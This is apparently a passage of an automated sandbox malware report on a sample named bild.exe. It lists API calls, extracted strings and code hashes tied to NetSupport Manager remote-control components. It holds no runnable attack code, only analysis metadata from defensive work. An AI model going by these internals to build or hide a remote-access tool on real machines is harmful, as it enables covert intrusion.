                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                      • API String ID: 47109696-3245241687
                                                                                                      • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                                      • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                                      • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                                      • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                                      APIs
                                                                                                        • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                                        • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                                        • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                      • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                      • API String ID: 806825551-1858614750
                                                                                                      • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                                      • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                                      • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                                      • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                                      APIs
                                                                                                        • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                        • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Downloads\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                                      • ResetEvent.KERNEL32(0000025C), ref: 11144269
                                                                                                      • SetEvent.KERNEL32(0000025C), ref: 1114427F
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                      • String ID: MiniDump
                                                                                                      • API String ID: 1494854734-2840755058
                                                                                                      • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                                      • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                                      • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                                      • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                                      APIs
                                                                                                        • Part of subcall function 6C755000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C755014
                                                                                                        • Part of subcall function 6C755000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C758E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C755034
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C758EAE
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C758EBF
                                                                                                        • Part of subcall function 6C752420: _strrchr.LIBCMT ref: 6C75242E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                      • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                      • API String ID: 3215810784-3459472706
                                                                                                      • Opcode ID: c8ea45771c049a19c8c162ff8b916ff697d0f3409631a2d154cc5018682ec783
                                                                                                      • Instruction ID: 14416c8f29a487ec7c50404987091f7c3e359c96cdfcebc9dd3ffa3509eb1052
                                                                                                      • Opcode Fuzzy Hash: c8ea45771c049a19c8c162ff8b916ff697d0f3409631a2d154cc5018682ec783
                                                                                                      • Instruction Fuzzy Hash: 1111E972B401189BDF109E50EE49FFA737CAB05305F804466EE19A7A40EF31AA68CB61
                                                                                                      APIs
                                                                                                      • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                                      • wsprintfA.USER32 ref: 11146E06
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                      • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                      • API String ID: 1985783259-2296142801
                                                                                                      • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                                      • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                                      • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                                      • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                      • wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      • _memset.LIBCMT ref: 1110F477
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                      • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                      • API String ID: 3234921582-2664294811
                                                                                                      • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                                      • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                                      • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                                      • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                                      APIs
                                                                                                        • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                                        • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                        • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                        • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                      • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                                      • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                                      • API String ID: 1108920153-1959555903
                                                                                                      • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                                      • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                                      • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                                      • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                                      APIs
                                                                                                      • wsprintfA.USER32 ref: 11031926
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                      • String ID: %s%s.bin$849224$clientinv.cpp$m_pDoInv == NULL
                                                                                                      • API String ID: 4180936305-2436277270
                                                                                                      • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                                      • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                                      • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                                      • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                                      • __strdup.LIBCMT ref: 111446A7
                                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                        • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                                      • _free.LIBCMT ref: 111446DC
                                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                      • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 398584587-0
                                                                                                      • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                                      • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                                      • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                                      • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                                      APIs
                                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                                        • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                                      • _free.LIBCMT ref: 1100EDB4
                                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                      • _free.LIBCMT ref: 1100EDC7
                                                                                                      • _free.LIBCMT ref: 1100EDDA
                                                                                                      • _free.LIBCMT ref: 1100EDED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3515823920-0
                                                                                                      • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                                      • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                                      • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                                      • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                                      APIs
                                                                                                        • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                        • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                        • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                      • wsprintfA.USER32 ref: 1114593E
                                                                                                      • wsprintfA.USER32 ref: 11145954
                                                                                                        • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
